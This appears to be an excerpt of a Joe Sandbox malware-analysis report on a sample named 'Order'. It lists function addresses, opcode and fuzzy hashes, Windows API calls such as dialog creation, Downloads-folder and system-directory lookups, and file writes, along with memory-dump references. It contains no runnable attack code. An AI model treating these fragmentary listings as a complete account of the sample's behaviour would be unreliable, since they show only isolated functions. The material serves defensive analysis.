                      • Opcode ID: 44050466ff59d092c84ade225eb2428a111c67205446c9fc6f6a12c7b28f2e65
                      • Instruction ID: 97b3e1327a1e87a4b46b26d767485ea51a150d14d874054969dc66b926ead844
                      • Opcode Fuzzy Hash: 44050466ff59d092c84ade225eb2428a111c67205446c9fc6f6a12c7b28f2e65
                      • Instruction Fuzzy Hash: 5FD1E6716083818FC704DF28C49026ABBE2EFD9304F188A6EE9D587752D379D94ACB55
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409956
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: cf9cd527b89156cf826f8aca8c9aac0ae0f1dbb698b08308560a1dccda5bc85b
                      • Instruction ID: bc48fdad81fd92ebd0be0b19d5c8e3ba934b166e7abd4bc921d629b17d7e6aca
                      • Opcode Fuzzy Hash: cf9cd527b89156cf826f8aca8c9aac0ae0f1dbb698b08308560a1dccda5bc85b
                      • Instruction Fuzzy Hash: 02B0017800422ADBDB019F10EC88BC83E72B749745F93C078E42981672EB79069EDA0C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                      • Instruction ID: f4dcce38d5e2b5fea8365ab6f66f10a9b642d7e6e28dacc25e9c3ad87e991d79
                      • Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                      • Instruction Fuzzy Hash: 3512C5B3B546144BD70CCE1DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DD9198685
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c460358eba1917bb56d4065ee02bd871fc6c6cc725e64d99fb649ce963d7fe5
                      • Instruction ID: fcc74630d9e7e7a990481c7c1f867b264d0775cdb04650b32c3420698d071277
                      • Opcode Fuzzy Hash: 7c460358eba1917bb56d4065ee02bd871fc6c6cc725e64d99fb649ce963d7fe5
                      • Instruction Fuzzy Hash: DE81E571620E52CBE718CF1DECD06B633A3E7C9320B49C638DA418779AC539E562D794
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 513e02c80492a0d3023dc35d6953037e38dfbd2ea3f16a7153b47b8225a4960d
                      • Instruction ID: 9051c99f30e4fd58257ce4a82e5c6de57c2f1ea08b849514de36b4a9f860707a
                      • Opcode Fuzzy Hash: 513e02c80492a0d3023dc35d6953037e38dfbd2ea3f16a7153b47b8225a4960d
                      • Instruction Fuzzy Hash: B571C3716205424BD724CF29FCD0A7633A2FBD9311B4BC73DDA4287296C238E962D694
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                      • Instruction ID: e7601879cae5e26ed9c4f46374459fbcb7982be31dee43e66e8e889727de3951
                      • Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                      • Instruction Fuzzy Hash: 384105736147054BF728CA28C8607EB7390AFD4304F49493FD89A87382C6F9E8C68689
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                      • Instruction ID: c66b0092c88908efcb1f6d3c64bb4500893f1a226118266ab98ff54ab3bb9a2b
                      • Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                      • Instruction Fuzzy Hash: B631D7726547054BE728C928C8A57EB7390BF94344F49493FC88A87382C6F9E9C6C289
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                      • Instruction ID: 9975ed08cb8d88c562da0411d9d676463dde2a9787c448613e09b1fe69d496df
                      • Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                      • Instruction Fuzzy Hash: 0421C573754B054BE728896CC8953EB7390BFA4344F49493FC996873C1CAEAE9C5C284
                      APIs
                        • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                        • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                        • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                      • GetStockObject.GDI32(00000011), ref: 00408FB2
                      • LoadIconW.USER32 ref: 00408FE9
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                      • RegisterClassExW.USER32 ref: 00409021
                      • IsWindowEnabled.USER32(00000000), ref: 00409048
                      • EnableWindow.USER32(00000000), ref: 00409059
                      • GetSystemMetrics.USER32(00000001), ref: 00409091
                      • GetSystemMetrics.USER32(00000000), ref: 0040909E
                      • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                      • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                      • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                      • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                      • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                      • wcslen.MSVCRT ref: 00409189
                      • wcslen.MSVCRT ref: 00409191
                      • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                      • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                      • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                      • SetForegroundWindow.USER32(00000000), ref: 0040921F
                      • BringWindowToTop.USER32(00000000), ref: 00409226
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                      • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                      • TranslateMessage.USER32(?), ref: 00409259
                      • DispatchMessageW.USER32(?), ref: 00409264
                      • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                      • wcslen.MSVCRT ref: 00409289
                      • wcscpy.MSVCRT ref: 004092A1
                      • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                      • String ID: 0$BUTTON$D0A$EDIT$STATIC
                      • API String ID: 54849019-2968808370
                      • Opcode ID: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                      • Instruction ID: 83f6c24ff00e7acae504a8cc9f4403d446bfccf5cce4438541287e2077ea33a9
                      • Opcode Fuzzy Hash: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                      • Instruction Fuzzy Hash: 4E91A070648304BFE7219F64DC49F9B7FA9FB48B50F00893EF644A61E1CBB988448B59
                      APIs
                      • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637
                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                        • Part of subcall function 004057F0: wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                        • Part of subcall function 004057F0: memmove.MSVCRT ref: 004058E1
                        • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02310000,00000000,?), ref: 0040DEF9
                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02310000,00000000,?,?), ref: 0040DF1C
                        • Part of subcall function 0040A6C5: wcsncpy.MSVCRT ref: 0040A6E3
                        • Part of subcall function 0040A6C5: wcslen.MSVCRT ref: 0040A6F5
                        • Part of subcall function 0040A6C5: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735
                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                      • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$fpA$fpA$fpA$fpA$fpA
                      • API String ID: 1295435411-3159487945
                      • Opcode ID: e02ab6fb7fb026371ba0f3169e7b8a9095618f3e0d19e2e904a50f584859e1f7
                      • Instruction ID: b4e4a0b709d291d116e2253cfe1eb4aef96e8d0e4325569d50da54c09323f468
                      • Opcode Fuzzy Hash: e02ab6fb7fb026371ba0f3169e7b8a9095618f3e0d19e2e904a50f584859e1f7
                      • Instruction Fuzzy Hash: E3B134B1504300AED600BBA1DD81E7F77A9EB88308F108D3FF544B61A2CA3DDD59966D
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 00409373
                        • Part of subcall function 0040E3F0: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E3FA
                      • memset.MSVCRT ref: 00409381
                      • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                      • wcsncpy.MSVCRT ref: 004093DD
                      • wcslen.MSVCRT ref: 004093F1
                      • CoTaskMemFree.OLE32(?), ref: 0040947A
                      • wcslen.MSVCRT ref: 00409481
                      • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                      • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                      • API String ID: 4193992262-92458654
                      • Opcode ID: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                      • Instruction ID: 23f57ca1c929181bfbc58391faabb4ebc57556df945843c0c8e437b0019b5ca4
                      • Opcode Fuzzy Hash: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                      • Instruction Fuzzy Hash: D3416471508704AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B6A
                      APIs
                      • wcsncpy.MSVCRT ref: 00406405
                        • Part of subcall function 0040E1E0: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E1EA
                      • _wcsdup.MSVCRT ref: 0040644E
                      • _wcsdup.MSVCRT ref: 00406469
                      • _wcsdup.MSVCRT ref: 0040648C
                      • wcsncpy.MSVCRT ref: 00406578
                      • free.MSVCRT(?), ref: 004065DC
                      • free.MSVCRT(?), ref: 004065EF
                      • free.MSVCRT(?), ref: 00406602
                      • wcsncpy.MSVCRT ref: 0040662E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: _wcsdupfreewcsncpy$Value
                      • String ID: $0A$$0A$$0A
                      • API String ID: 1554701960-360074770
                      • Opcode ID: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                      • Instruction ID: a3954b37eea6ac6c251c7ba509b6f2d99b081bbe67bc4aeebc7e0be9c04ba548
                      • Opcode Fuzzy Hash: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                      • Instruction Fuzzy Hash: 30A1BD715043019BCB209F18C881A2BB7F1EF94348F49093EF88667391E77AD965CB9A
                      APIs
                        • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                        • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02310000,00000000,?,?), ref: 0040E2C7
                      • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A863
                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A875
                      • wcscpy.MSVCRT ref: 0040A89B
                      • wcscat.MSVCRT ref: 0040A8A6
                      • wcslen.MSVCRT ref: 0040A8AC
                      • CoTaskMemFree.OLE32(?,00000000,00000000,?,02319778,00000000,00000000), ref: 0040A8BA
                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A8C1
                      • wcscat.MSVCRT ref: 0040A8D9
                      • wcslen.MSVCRT ref: 0040A8DF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                      • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                      • API String ID: 1740785346-287042676
                      • Opcode ID: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                      • Instruction ID: ae609db33c227b916d8c96984f24cc4820d8d1ee700964f601e6ad2a5a3ba7d8
                      • Opcode Fuzzy Hash: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                      • Instruction Fuzzy Hash: C821F871344701B6D2303B62EC4EF6F2A78DB91B90F11483BF901B51D2D6BC8A6199AF
                      APIs
                      • TlsAlloc.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00412092
                      • InitializeCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 0041209E
                      • TlsGetValue.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 004120B4
                      • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120CE
                      • EnterCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 004120DF
                      • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120FB
                      • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00412114
                      • GetCurrentThread.KERNEL32 ref: 00412117
                      • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 0041211E
                      • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412121
                      • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041217A,00000000,000000FF,00000008), ref: 00412137
                      • TlsSetValue.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412144
                      • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412155
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                      • String ID:
                      • API String ID: 298514914-0
                      • Opcode ID: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                      • Instruction ID: d80fd07e77255670f12a4e616af7295cf706cbaed93ad9a0fedfb01b657d880b
                      • Opcode Fuzzy Hash: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                      • Instruction Fuzzy Hash: 35211971644305FFDB119F64ED88B963FBAFB49311F04C43AFA09962A1CBB49850DB68
                      APIs
                      • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434
                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02310000,00000000,?,?), ref: 0040DF1C
                      • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B
                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02310000,00000000,?), ref: 0040DEF9
                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                      • String ID: sysnative
                      • API String ID: 3406704365-821172135
